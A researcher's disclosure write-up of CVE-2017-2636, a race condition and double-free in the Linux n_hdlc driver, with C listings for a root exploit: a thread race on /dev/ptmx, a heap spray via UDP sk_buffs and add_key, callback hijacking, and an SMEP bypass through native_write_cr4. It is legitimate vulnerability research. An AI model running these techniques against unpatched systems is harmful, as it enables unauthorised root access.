This article discloses the exploitation of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver (drivers/tty/n_hdlc.c). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP).
This driver provides the HDLC serial line discipline and comes as a kernel module in many Linux distributions that have CONFIG_N_HDLC=m in the kernel config. So RHEL 6/7, Fedora, SUSE, Debian, and Ubuntu were affected by CVE-2017-2636.
The flaw is now fixed in the mainline Linux kernel (public disclosure). The bug was introduced quite a long time ago, so the patch has been backported to the stable kernel versions too.
I’ve managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains the root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn’t cope with Supervisor Mode Access Prevention (SMAP), although that is possible with some additional effort.
My PoC also doesn’t defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel attack (see xairy’s implementation).
Initially, the N_HDLC line discipline used a self-made singly linked list for data buffers and had the n_hdlc.tbuf pointer for retransmitting a buffer after an error. It worked, but commit be10eb75893 added data flushing and introduced racy access to n_hdlc.tbuf.
After a tx error, concurrent flush_tx_queue() and n_hdlc_send_frames() both use n_hdlc.tbuf and can put one buffer to tx_free_buf_list twice. That causes an exploitable double-free error in n_hdlc_release(). The data buffers are represented by struct n_hdlc_buf and allocated in the kmalloc-8192 slab cache.
To fix this bug, I used a standard kernel linked list and got rid of the racy n_hdlc.tbuf: in case of a tx error, the current n_hdlc_buf item is put after the head of tx_buf_list.
I started the investigation when I got a suspicious kernel crash from syzkaller. It is a really great project, which has helped to fix an impressively big list of bugs in the Linux kernel.
This article is the only way for me to publish the exploit code. So, please, be patient and be prepared for plenty of listings!
Let’s look at the code of the main loop, which keeps racing until it succeeds:
for (;;) {
    long tmo1 = 0;
    long tmo2 = 0;

    if (loop % 2 == 0)
        tmo1 = loop % MAX_RACE_LAG_USEC;
    else
        tmo2 = loop % MAX_RACE_LAG_USEC;
The loop counter is incremented every iteration, so the tmo1 and tmo2 variables are changing too. They are used for making lags in the racing threads, which synchronize at the pthread_barrier, wait for the specified lag, and then interact with n_hdlc. Such a way of colliding threads helps to hit the race condition earlier.
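The lag schedule described above can be sketched in isolation. This is only an illustration of the arithmetic from the listing: the value chosen for MAX_RACE_LAG_USEC is an assumption (the article does not show it), and the helper names race_lags() and print_lag_schedule() are hypothetical.

```c
#include <stdio.h>

/* Assumed value: the real MAX_RACE_LAG_USEC is not shown in the article. */
#define MAX_RACE_LAG_USEC 50

/* Mirrors the main loop: even iterations delay the first thread,
 * odd iterations delay the second one, and the other lag stays 0. */
void race_lags(long loop, long *tmo1, long *tmo2)
{
    *tmo1 = 0;
    *tmo2 = 0;
    if (loop % 2 == 0)
        *tmo1 = loop % MAX_RACE_LAG_USEC;
    else
        *tmo2 = loop % MAX_RACE_LAG_USEC;
}

/* Prints the lag pair for the first n iterations of the loop. */
void print_lag_schedule(long n)
{
    for (long loop = 0; loop < n; loop++) {
        long tmo1, tmo2;

        race_lags(loop, &tmo1, &tmo2);
        printf("loop %ld: tmo1=%ld tmo2=%ld\n", loop, tmo1, tmo2);
    }
}
```

Sweeping the lag this way means that each thread in turn gets every delay from 0 up to the maximum, so the relative timing of the two racing calls is varied systematically instead of relying on scheduler noise alone.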
    ptmd = open("/dev/ptmx", O_RDWR);
    if (ptmd < 0) {
        perror("[-] open /dev/ptmx");
        goto end;
    }

    ret = ioctl(ptmd, TIOCSETD, &ldisc);
    if (ret < 0) {
        perror("[-] TIOCSETD");
        goto end;
    }
Here we open a pseudoterminal master and slave pair and set the N_HDLC line discipline for it. For more information about that, see man ptmx, Documentation/serial/tty.txt and this great discussion about pty components.
Setting the N_HDLC ldisc for a serial line causes the n_hdlc kernel module to be autoloaded. You can get the same effect using the ldattach daemon.
    ret = ioctl(ptmd, TCXONC, TCOOFF);
    if (ret < 0) {
        perror("[-] TCXONC TCOOFF");
        goto end;
    }

    bytes = write(ptmd, buf, TTY_BUF_SZ);
    if (bytes != TTY_BUF_SZ) {
        printf("[-] write to ptmx (bytes)\n");
        goto end;
    }
Here we suspend the pseudoterminal output (see man tty_ioctl) and write one data buffer. The n_hdlc_send_frames() fails to send this buffer and saves its address in n_hdlc.tbuf.
We are ready for the race. Start two threads, which are allowed to run on all available CPU cores: the first one flushes the data with ioctl(ptmd, TCFLSH, TCIOFLUSH); the second one resumes the suspended output with ioctl(ptmd, TCXONC, TCOON). In a lucky case, they both put the only written buffer pointed to by n_hdlc.tbuf to tx_free_buf_list.
Now we return to CPU 0 and trigger the possible double-free error:
    ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);
    if (ret != 0) {
        perror("[-] sched_setaffinity");
        goto end;
    }

    ret = close(ptmd);
    if (ret != 0) {
        perror("[-] close /dev/ptmx");
        goto end;
    }
We close the pseudoterminal master. The n_hdlc_release() goes through n_hdlc_buf_list items and frees the kernel memory used for data buffers. Here the possible double-free error happens.
This particular bug is successfully detected by the Kernel Address Sanitizer (KASAN), which reports the use-after-free happening just before the second kfree().
The final part of the main loop:
    ret = exploit_skb(socks, sockaddrs, payload, loop % SOCK_PAIRS);
    if (ret != EXIT_SUCCESS)
        goto end;

    if (getuid() == 0 && geteuid() == 0) {
        printf("[+] race #%ld: WIN! flush(%ld), TCOON(%ld)\n",
               loop, tmo1, tmo2);
        break; /* :) */
    }

    loop++;
}

printf("[+] finish as: uid=0, euid=0, start sh...\n");
run_sh();
Here we try to exploit the double-free error by overwriting struct sk_buff. In case of success, we exit from the main loop and run the root shell in the child process using execve().
As I mentioned, the doubly freed n_hdlc_buf item is allocated in the kmalloc-8192 slab cache. To exploit a double-free error in this cache, we need some kernel objects with a size a bit less than 8 kB. Actually, we need two types of such objects: one containing a function pointer, and another one with controllable contents that can overwrite that pointer.
Searching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I’ve chosen sk_buff with its destructor_arg in struct skb_shared_info. This approach is not new; consider reading the cool write-up about CVE-2016-2384.
The network-related buffers in the Linux kernel are represented by struct sk_buff. See these great pictures describing the sk_buff data layout. The most important thing for us is that the network data and skb_shared_info are placed in the same kernel memory block pointed to by sk_buff.head. So creating a 7500-byte network packet in userspace will make skb_shared_info be allocated in the kmalloc-8192 slab cache. Exactly what we want.
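The size-class reasoning above can be checked with a little arithmetic. The sketch below assumes that sizeof(struct skb_shared_info) is 320 bytes on the target x86_64 kernel, which is consistent with the SKB_END_OFFSET value of 7872 = 8192 - 320 used later in the article; it also ignores protocol headers and alignment padding, which do not change the resulting class for a 7500-byte packet. The function names are hypothetical.

```c
#include <stddef.h>

/* Assumption: size of struct skb_shared_info on the target kernel. */
#define ASSUMED_SHINFO_SZ 320

/* Rounds a request up to the next power of two. Only meaningful for
 * sizes above 256 bytes, where the generic kmalloc caches are
 * power-of-two sized (512, 1024, ..., 8192). */
size_t kmalloc_size_class(size_t size)
{
    size_t cls = 512;

    while (cls < size)
        cls <<= 1;
    return cls;
}

/* skb_shared_info sits at the very end of the allocated block. */
size_t shinfo_offset_in_block(size_t block_size)
{
    return block_size - ASSUMED_SHINFO_SZ;
}
```

With these assumptions, a 7500-byte packet plus the shared info needs 7820 bytes, which is too big for kmalloc-4096 and therefore lands in kmalloc-8192, with skb_shared_info starting at offset 7872 of the block.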
But there is one challenge: n_hdlc_release() frees 13 n_hdlc_buf items straight away. At first I tried to do the heap spray in parallel with n_hdlc_release(), but didn’t manage to inject the corresponding kmalloc() between the needed kfree() calls. So I used another way: spraying after n_hdlc_release() can give two sk_buff items with head pointing to the same memory. That’s promising.
So we need to spray hard but keep 8 kB UDP packets allocated to avoid a mess in the allocator freelist. Socket queues are limited in size, so I’ve created a lot of sockets using socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), including a dedicated server socket for the packets that are likely to share the same sk_buff.head.
Ok. Now we need another kernel object for overwriting the function pointer in skb_shared_info.destructor_arg. We can’t use sk_buff.head for that again, because skb_shared_info is placed at the same offset in sk_buff.head and we don’t control it. I was really happy to find that the add_key syscall is able to allocate controllable data in kmalloc-8192 too.
But I became upset when I encountered the key data quotas in /proc/sys/kernel/keys/ owned by root. The default value of /proc/sys/kernel/keys/maxbytes is 20000. It means that only 2 add_key syscalls can concurrently store our 8 kB payload in the kernel memory, and that’s not enough.
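The quota limit mentioned above is simple integer division. The following sketch is a simplification: it ignores any per-key overhead (such as the key description) that the kernel may also charge against the quota, and the function name keys_within_quota() is hypothetical.

```c
/* How many payloads of payload_sz bytes fit into a key quota of
 * maxbytes. Simplification: per-key overhead is not counted. */
long keys_within_quota(long maxbytes, long payload_sz)
{
    if (payload_sz <= 0)
        return 0;
    return maxbytes / payload_sz;
}
```

For the default quota of 20000 bytes and the 8100-byte payload used in this article, two keys fit (16200 bytes) and a third one would need 24300 bytes.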
But the happiness returned when I came across a bright idea in the slides of Di Shen from Keen Security Lab: I can make the heap spray successful even if add_key fails!
So, let’s look at the init_payload() code:
#define MMAP_ADDR 0x10000lu
#define PAYLOAD_SZ 8100
#define SKB_END_OFFSET 7872
#define KEY_DATA_OFFSET 18

int init_payload(char *p)
{
    struct skb_shared_info *info = (struct skb_shared_info *)(p +
                SKB_END_OFFSET - KEY_DATA_OFFSET);
    struct ubuf_info *uinfo_p = NULL;
The definitions of struct skb_shared_info and struct ubuf_info are copied to the exploit code from the include/linux/skbuff.h kernel header.
The payload buffer will be passed to add_key as a parameter, and the data which we put there at the 7872 - 18 = 7854 byte offset will exactly overwrite skb_shared_info.
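The offset arithmetic above can be spelled out with the same macros. This is only a worked check of the numbers in the listing; the function names are hypothetical, and the 8192-byte block size is taken from the kmalloc-8192 cache named in the article.

```c
#define PAYLOAD_SZ 8100
#define SKB_END_OFFSET 7872
#define KEY_DATA_OFFSET 18
#define SLAB_OBJECT_SZ 8192 /* kmalloc-8192 object size */

/* Offset inside the user buffer that lines up with skb_shared_info:
 * the key data starts KEY_DATA_OFFSET bytes into the kernel object. */
long shinfo_offset_in_payload(void)
{
    return SKB_END_OFFSET - KEY_DATA_OFFSET;
}

/* Offset inside the kernel object where the copied user data ends. */
long payload_end_in_object(void)
{
    return KEY_DATA_OFFSET + PAYLOAD_SZ;
}
```

The first function gives 7854, matching the text. The second gives 8118, which is below 8192, so the whole payload still fits into one kmalloc-8192 object while covering the skb_shared_info location.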
    char *area = NULL;
    void *target_addr = (void *)(MMAP_ADDR);

    area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (area != target_addr) {
        perror("[-] mmap");
        return EXIT_FAILURE;
    }

    uinfo_p = target_addr;
    uinfo_p->callback = (uint64_t)root_it;
    info->destructor_arg = (uint64_t)uinfo_p;
    info->tx_flags = SKBTX_DEV_ZEROCOPY;
The ubuf_info.callback is called in skb_release_data() if skb_shared_info.tx_flags has the SKBTX_DEV_ZEROCOPY flag set. In our case, the ubuf_info item resides in userspace memory, so dereferencing its pointer in kernelspace will be detected by SMAP.
Anyway, now the callback points to root_it(), which does the classical commit_creds(prepare_kernel_cred(0)). However, this shellcode resides in userspace too, so executing it in kernelspace will be detected by SMEP. We are going to bypass it soon.
As I mentioned, n_hdlc_release() frees thirteen n_hdlc_buf items. Our exploit_skb() is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket.
Now we are going to perform the use-after-free on sk_buff.data: we receive these packets on the dedicated server socket one by one and execute several add_key syscalls with our payload after receiving each of them. The exact number of add_key syscalls giving the best results was found empirically by testing the exploit many times. An example of the add_key call:
    k[0] = syscall(__NR_add_key, "user", "payload0",
                   payload, PAYLOAD_SZ, KEY_SPEC_PROCESS_KEYRING);
If we won the race and the heap spray was lucky, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory:
    for (i = 0; i < KEYS_N; i++) {
        if (k[i] > 0)
            syscall(__NR_keyctl, KEYCTL_INVALIDATE, k[i]);
    }
Now we need to prepare the heap for the next round of n_hdlc racing. /proc/slabinfo shows that a kmalloc-8192 slab stores only 4 objects, so the double-free error has a high chance of crashing the allocator. But the following trick helps to avoid that and makes the exploit much more stable: send a dozen UDP packets to fill the partially emptied slabs.
As I mentioned, the root_it() shellcode resides in userspace. Executing it in kernelspace is detected by SMEP (Supervisor Mode Execution Protection). It is an x86 feature that is enabled by setting bit 20 of the CR4 register.
There are several approaches to defeat it. For example, Vitaly Nikolenko describes how to switch off SMEP using the stack pivoting ROP technique. It works great, but I didn’t want to copy it blindly. So I’ve created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known.
In arch/x86/include/asm/special_insns.h I’ve found this function:
static inline void native_write_cr4(unsigned long val)
{
    printk("wcr4: 0x%lx\n", val);
    asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}
It writes its first argument to CR4.
Now let’s look at skb_release_data(), which executes the hijacked callback in Ring 0:
    if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
        struct ubuf_info *uarg;

        uarg = shinfo->destructor_arg;
        if (uarg->callback)
            uarg->callback(uarg, true);
    }
We see that the destructor callback takes the uarg address as the first argument. And we control this address in the exploited sk_buff.
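The calling convention described above can be illustrated with a small userspace mock. Nothing here touches the kernel: struct mock_ubuf_info, mock_release() and the other names are hypothetical stand-ins that only mimic the shape of the kernel snippet, to show that the callback receives the address of the structure itself as its first argument.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Userspace stand-in for the kernel structure holding the callback. */
struct mock_ubuf_info {
    void (*callback)(struct mock_ubuf_info *, bool);
};

/* Remembers the first argument of the most recent callback call. */
static uintptr_t last_first_arg;

void record_first_arg(struct mock_ubuf_info *uarg, bool success)
{
    (void)success;
    last_first_arg = (uintptr_t)uarg;
}

/* Same shape as the skb_release_data() fragment shown above. */
void mock_release(struct mock_ubuf_info *uarg)
{
    if (uarg->callback)
        uarg->callback(uarg, true);
}

/* Runs the release path and reports what the callback received. */
uintptr_t first_arg_seen_by_callback(struct mock_ubuf_info *uarg)
{
    last_first_arg = 0;
    mock_release(uarg);
    return last_first_arg;
}
```

In this mock, the value seen by the callback always equals the address of the structure passed to mock_release(), so whoever chooses where the structure lives also chooses the callback's first argument.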
So I’ve decided to write the address of native_write_cr4() to ubuf_info.callback and put the ubuf_info item at the mmap’ed userspace address 0x406e0, which is the correct value of CR4 with disabled SMEP.
In that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: the first time to disable SMEP, the second time to execute the shellcode. But that’s not a problem for this particular exploit, since it is fast and reliable.
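The relation between the CR4 value and the SMEP bit can be written down as plain bit arithmetic. The bit positions below are the architectural ones (OSXSAVE is bit 18, SMEP is bit 20, SMAP is bit 21); the macro and function names are hypothetical, and 0x1406e0 is just the article's 0x406e0 with bit 20 set, used as an example of a value with SMEP enabled.

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_OSXSAVE (UINT64_C(1) << 18)
#define CR4_SMEP    (UINT64_C(1) << 20)
#define CR4_SMAP    (UINT64_C(1) << 21)

/* True if the SMEP bit is set in the given CR4 value. */
bool cr4_smep_enabled(uint64_t cr4)
{
    return (cr4 & CR4_SMEP) != 0;
}

/* The same CR4 value with only the SMEP bit cleared. */
uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~CR4_SMEP;
}
```

Clearing bit 20 in 0x1406e0 yields 0x406e0, the value used in this article, and that value has neither the SMEP nor the SMAP bit set.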
So let’s initialize the payload a bit differently:
#define CR4_VAL 0x406e0lu

    void *target_addr = (void *)(CR4_VAL & 0xfffff000lu);

    area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (area != target_addr) {
        perror("[-] mmap");
        return EXIT_FAILURE;
    }

    uinfo_p = (struct ubuf_info *)CR4_VAL;
    uinfo_p->callback = NATIVE_WRITE_CR4;
    info->destructor_arg = (uint64_t)uinfo_p;
    info->tx_flags = SKBTX_DEV_ZEROCOPY;
That SMEP bypass looks witty, but it introduces one additional requirement: it needs bit 18 (OSXSAVE) of CR4 set to 1. Otherwise target_addr becomes 0 and mmap() fails, since mapping the zero page is not allowed.
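The OSXSAVE requirement follows directly from the page-mask arithmetic in the listing. The sketch below reuses the 0xfffff000 mask from the article; the names PAGE_MASK_4K, mmap_base_for() and offset_in_page() are hypothetical.

```c
#include <stdint.h>

/* Same mask as in the listing: drops the low 12 bits (4 kB page). */
#define PAGE_MASK_4K UINT64_C(0xfffff000)

/* Page-aligned address that has to be mapped for a given CR4 value. */
uint64_t mmap_base_for(uint64_t cr4_val)
{
    return cr4_val & PAGE_MASK_4K;
}

/* Where inside that page the structure would be placed. */
uint64_t offset_in_page(uint64_t cr4_val)
{
    return cr4_val & UINT64_C(0xfff);
}
```

For 0x406e0 the page base is 0x40000 and the structure starts at offset 0x6e0 inside it. Without bit 18 the value would be 0x6e0, whose page base is 0, which is exactly the zero-page case that mmap() rejects.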
Investigating CVE-2017-2636 and writing this article was great fun for me. I want to thank Positive Technologies for giving me the opportunity to work on this research. I would really appreciate feedback. See my contacts below.